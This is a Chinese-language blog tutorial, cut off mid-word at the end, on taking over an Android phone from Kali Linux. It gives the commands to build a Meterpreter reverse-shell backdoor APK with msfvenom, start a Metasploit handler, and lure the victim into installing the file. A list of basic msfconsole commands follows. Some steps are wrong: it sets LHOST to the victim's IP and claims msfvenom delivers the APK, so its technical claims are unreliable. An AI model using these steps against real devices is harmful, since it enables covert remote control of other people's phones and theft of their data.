admin管理员组

文章数量:1122849

写在前面:本文仅限学术交流,请勿用他人实践

Kali对安卓手机的攻击(渗透)

我们首先需要确定本机IP

这很简单,对于Kali来说我们需要打开终端并键入

ifconfig

即可获取自己的IP,然后我们需要确定安卓手机也就是被攻击者的IP,只需键入

fping -g 本机IP地址/24

这时我们就能确定目标IP,这次教程主要围绕创建后门程序展开

在终端中执行:

# msfvenom -p android/meterpreter/reverse_tcp LHOST=目标IP LPORT=接收的端口 > my_backdoor.apk

将代码段中的“目标IP”改为刚刚确定的被攻击者的IP)这时就会创建一个后门程序,后缀名为.apk格式(也就是安卓的安装包格式)并发送到所指IP下的安卓系统中

接下来要启动Metasploit

这里使用以下命令

msf > use exploit/multi/handler
> set payload android/meterpreter/reverse_tcp
> set lhost 目标IP
> set lport 接收端口
> exploit

也就是“点对点打击”或者是“IP对IP”

这里我用安卓的虚拟机做了渗透

通过诱导虚拟机点开后门程序即可控制手机

当安卓手机点开木马(.apk)之后我们就获得了对肉鸡的控制权

使用help查看命令:

多例如:

service apache2 start

service postgresql start

msfconsole启动

1.MSF终端命令

show exploit

列出metasploit框架中的所有渗透攻击模块。

show payloads

列出metasploit框架中的所有攻击载荷。

show auxiliary

列出metasploit框架中的所有辅助攻击模块。

search name

查找metasploit框架中的所有渗透攻击和其他模块。

in

本文标签: 手机kali